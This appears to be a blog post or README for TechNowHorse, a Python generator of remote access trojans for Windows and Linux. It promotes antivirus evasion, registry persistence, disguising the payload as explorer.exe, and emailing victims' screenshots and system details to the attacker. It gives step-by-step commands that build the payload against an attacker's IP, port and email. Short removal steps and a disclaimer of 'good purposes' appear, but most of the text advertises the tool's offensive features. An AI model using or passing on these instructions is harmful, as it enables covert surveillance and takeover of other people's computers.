TechNowHorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.
This tool is coded by me and it is totally free to use, modify & distribute.
The Payload generated by it bypasses almost all major anti-viruses, and will improve with the passage of time.
This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
This tool is created by me (Pushpender Singh) the owner of this website, all contributor’s are welcome, they can request for pull in GitHub, if their work is worthy for this project then there work will merged by me.
This small tool can do really awesome work.
Let us explore the functionality of this tool,
- Works on Windows/Linux
- Notify New Victim Via Email
- Sends Screenshot of Victim PC’s Screen via email
- Give Full Meterpreter Access to Attacker
- Didn’t ever require metesploit installed to create trojan
- Creates Executable Binary With Zero Dependencies
- Generates payload of less size, approx 5mb in size
Following is the limitations of meterpreter payload generated using metasploit:-
- Have to run the Metasploit Listener before executing backdoor
- Backdoor itself don’t become persistence, we have to use the post exploitation modules in order to make backdoor persistence. And post exploitation modules can only be used after successful exploitation.
- Didn’t Notify us whenever payload get executed on new system.
We all know how powerful the Meterpeter payload is but still the payload made from it is not satisfactory.
Following are the features of this payload generator which will give you a good idea of this python script:-
- Uses Windows registry to become persistence in windows.
- Also manages to become persistence in Linux system.
- Payload can run on LINUX as well as WINDOWS.
- Provide Full Access, as metasploit listener could be used as well as supports custom listener (You can Create Your Own Listener)
- Sends Email Notification, when ever payload runs on new system, with complete system info.
- Generates payload within 1 minute of ever less.
- Supports all meterpreter post exploitation modules.
- Payload Can be Created on Windows as well as Linux system.
- Python 3.X
- Few External Modules
This tool is purely written in python programming language, so that is why it will run on any system.
Note:- Currently Macintosh system are not supported, as it will automatically become persistence, and for that it first detects the system.
How to Use in Kali Linux OS
Note:- Procedure for Any Linux OS is literally same.
# Install dependencies $ Install latest python 3.x # Clone this repository [email protected]:~# git clone https://github.com/Technowlogy-Pushpender/technowhorse.git # Go into the repository [email protected]:~# cd technowhorse # Installing dependencies [email protected]:~# python -m pip install -r requirements.txt [email protected]:~# chmod +x paygen.py [email protected]:~# ./paygen.py --help or python paygen.py --help # Making Payload/RAT [email protected]:~# python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name
How to Use in Windows OS
Any windows OS with python 3.X installed can be used to generate payload for Linux as well as windows.
As in windows, to execute an executable you don’t have to give executable permissions, so you can run directly form the command prompt or power shell.
First, download the zip of this git repository.
And follow the following code display screen;
# Install dependencies $ Install latest python 3.x # Clone/Download this repository $ git clone https://github.com/Technowlogy-Pushpender/technowhorse.git Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. # Go into the repository C:\Users\Pushpender singh> cd technowhorse # Installing dependencies C:\Users\Pushpender singh> python -m pip install -r requirements.txt # Open paygen.py in Text editor and Configure Line 7 "PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" " # Getting Help Menu C:\Users\Pushpender singh> python paygen.py --help C:\Users\Pushpender singh> python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name
Note:- Evil File will be saved inside dist/ folder, inside technowhorse/ folder
Running paygen.py Script
When RAT runs, it adds Registry to become persistence
Makes copy of itself and saved it inside Roaming
Report been sended by RAT
Getting Notification From Victim PC
Currently this repo is maintained by me (Pushpender Singh). Owner of https://www.technowlogy.tk Website.
All contributor’s pull request will be accepted if their pull request is worthy for this repo.
- Add new features
- Contribute GUI
Removing Trojan Horse
- Go to start, type regedit and run the first program, this will open the registry editor.
- Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called winexplorer, right click this entry and select Delete.
- Go to your user path > AppData > Roaming, you’ll see a file named “explorer.exe”, this is the RAT, right click > Delete.
- Restart the System.
This tool didn’t create any temp file and thus didn’t left any traces. Whenever new victim executes the payload, attacker get notified via email with complete info of target system.(That is why valid email and password is required)
All the screenshot been captured by this RAT is automatically deleted by RAT once they delivered to attacker via email.
Tool didn’t ever required metasploit to be installed on system to generate their own RAT (Remote Access Trojan)
So, guys that is all about this blog, hope you enjoyed this blog,
If you have any doubt/issue the please mention the issue in this GitHub repository
This is the official GitHub Repository.
More features are coming soon…
If you have any new idea or want to add new features to it or want to contribute GUI version of this tool, then you are most welcome.